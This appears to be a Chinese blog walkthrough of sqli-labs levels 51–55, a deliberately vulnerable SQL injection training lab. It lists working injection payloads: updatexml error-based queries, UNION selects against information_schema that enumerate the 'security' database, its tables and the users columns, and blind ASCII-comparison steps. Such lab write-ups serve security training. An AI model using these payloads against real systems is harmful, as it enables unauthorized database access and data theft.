当前位置: 首页 > news >正文

sql-labs51-55通关攻略

第51关

一.查询数据库

1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

f5c8bf168b214f38bb3675c4a6f7c619.png

二.查表

' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --+

9c6aa9722afa46b8a1781f671a236ab7.png

 三.查列

' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1)--+ 

ae5af26bff9a47079d48ec3c0c66f71d.png

第52关

一.查询数据库第一位字符

判断ascii码如下图所示,说明大于114不大于115说明第一个字符为‘s’

dd2442b2b7744252a1de78ea38ae1ca8.png

eb4843a85da443e4b63e4eaae190ef39.png

同上所述

.........

最终得出数据库为'security' 

二.查数据库中第一张表1的第一个字符

判断ascii码如下图所示,说明大于100不大于101说明第一个字符为‘e‘

5ca9a47b1c574ca787d01a91232a2730.png

f1cec931d25f44d0aa5b2caa886a92f9.png

 最终得出第一张表为’emails‘

第53关

一.查询数据库第一位字符

判断ascii码如下图所示,说明大于114不大于115说明第一个字符为‘s’

6124f44edf1f45e99876104b3503dd3e.png

3606b679eb9d4e0ca9421ebd2718e176.png 

同上所述

.........

最终得出数据库为'security' 

二.查security数据库中第一张表的第一位字符

判断ascii码如下图所示,说明大于100不大于101说明第一个字符为‘e‘

476e47937e1846299f65e7c618baecb0.png

b61aaaec1a6748cd8ec782b2369ff989.png

 最终得出第一张表为’emails‘

 

第54关

一.查询数据库

http://172.16.1.126/Less-54/?id=-1%27%20union%20select%201,database(),3--+

3f058a0ba2fc4b25885a39db1d97a2da.png

二.查表

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

ff3fbe434a1443359a7cf9271b1041c5.png 
三.查列

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

61a8af41204e4dbabe80d44409fae3ca.png

 

第55关

一.查询数据库

?id=-1)union select 1,2,database()--+

cdfd6c6a40c042b3bcb3781b55049465.png

二.查表

?id=-1)union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

96e863b1815b4d5a8b180561bf16f8a9.png 

三.查列

?id=-1)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

4ee6a32d30294ddc8707cfc76a9dd67b.png 

 

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 在react 中还有另外一种three.js 渲染方式
  • 51单片机-DS1302,操作简述
  • MySQL面试题--最全面-索引
  • Sqoop部署和基本操作
  • VBA学习(71):Excel VBA 访问带密码保护的Access数据库/用户窗体设置/EXCEL用户+密码登录界面(Access版)
  • vite项目配置本地开发使用https访问
  • vue3页面空白-普通函数和箭头函数提升的不同
  • 探索Python世界的趣味之旅:自制贪吃蛇游戏
  • 【Python123题库】#大学排行榜分析 #数据统计 #罗马数字转换
  • 【leetcode详解】一个小组的最大实力值【中等】
  • 如何用RoBERTa高效提取事件文本结构特征:多层次上下文建模与特征融合
  • Spring全局异常处理HandlerExceptionResolver使用
  • lambda c++/java/kotlin
  • 鸿蒙(API 12 Beta6版)图形【使用Text模块实现文本显示】方舟2D图形服务
  • 【运维监控】influxdb 2.0+telegraf 监控tomcat 8.5运行情况(1)
  • [译] React v16.8: 含有Hooks的版本
  • HTTP传输编码增加了传输量,只为解决这一个问题 | 实用 HTTP
  • Java|序列化异常StreamCorruptedException的解决方法
  • JavaScript 无符号位移运算符 三个大于号 的使用方法
  • JavaScript中的对象个人分享
  • php ci框架整合银盛支付
  • Python 反序列化安全问题(二)
  • Quartz实现数据同步 | 从0开始构建SpringCloud微服务(3)
  • React 快速上手 - 06 容器组件、展示组件、操作组件
  • springboot_database项目介绍
  • underscore源码剖析之整体架构
  • vue和cordova项目整合打包,并实现vue调用android的相机的demo
  • Vue小说阅读器(仿追书神器)
  • windows下使用nginx调试简介
  • 阿里云购买磁盘后挂载
  • 反思总结然后整装待发
  • 手写双向链表LinkedList的几个常用功能
  • 手写一个CommonJS打包工具(一)
  • 想写好前端,先练好内功
  • 学习Vue.js的五个小例子
  • 优秀架构师必须掌握的架构思维
  • 由插件封装引出的一丢丢思考
  • 深度学习之轻量级神经网络在TWS蓝牙音频处理器上的部署
  • 关于Kubernetes Dashboard漏洞CVE-2018-18264的修复公告
  • 曾刷新两项世界纪录,腾讯优图人脸检测算法 DSFD 正式开源 ...
  • !! 2.对十份论文和报告中的关于OpenCV和Android NDK开发的总结
  • #鸿蒙生态创新中心#揭幕仪式在深圳湾科技生态园举行
  • #周末课堂# 【Linux + JVM + Mysql高级性能优化班】(火热报名中~~~)
  • (delphi11最新学习资料) Object Pascal 学习笔记---第13章第6节 (嵌套的Finally代码块)
  • (WSI分类)WSI分类文献小综述 2024
  • (八)c52学习之旅-中断实验
  • (二)延时任务篇——通过redis的key监听,实现延迟任务实战
  • (二刷)代码随想录第15天|层序遍历 226.翻转二叉树 101.对称二叉树2
  • (附源码)spring boot车辆管理系统 毕业设计 031034
  • (四)库存超卖案例实战——优化redis分布式锁
  • (算法)Game
  • (转)菜鸟学数据库(三)——存储过程
  • **CI中自动类加载的用法总结
  • .MSSQLSERVER 导入导出 命令集--堪称经典,值得借鉴!
  • .NET Framework 服务实现监控可观测性最佳实践